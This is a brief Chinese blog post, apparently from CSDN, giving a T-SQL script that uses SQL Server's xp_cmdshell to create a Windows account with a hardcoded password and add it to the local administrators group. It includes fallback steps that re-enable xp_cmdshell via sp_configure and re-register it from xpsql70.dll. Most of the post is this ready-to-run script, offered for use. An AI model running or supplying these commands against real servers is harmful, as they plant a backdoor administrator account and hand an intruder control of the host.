通过SQL SERVER加入系统管理员帐号。当然是须要有足够的权限,远程链接数据库后执行脚本,脚本例如以下:
/*
此代码是在master数据库下执行
添加系统管理员:mmcgzs password:123qwe!@#
*/
xp_cmdshell 'net user mmcgzs 123qwe!@# /add'
xp_cmdshell 'net localgroup administrators mmcgzs /add'
/*
假设上面的不好使。使用以下这个命令后在使用上面的
*/
sp_configure 'show advanced options',1
reconfigure
go
sp_configure 'xp_cmdshell',1
reconfigure
go
/*
假设上面的不好使。使用以下这个命令后在使用上面的
*/
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
希望以上分享对初学朋友有些帮助,谢谢!
很多其它关注付义方技术博客:http://blog.csdn.net/fuyifang
或者直接用手机扫描二维码查看很多其它博文: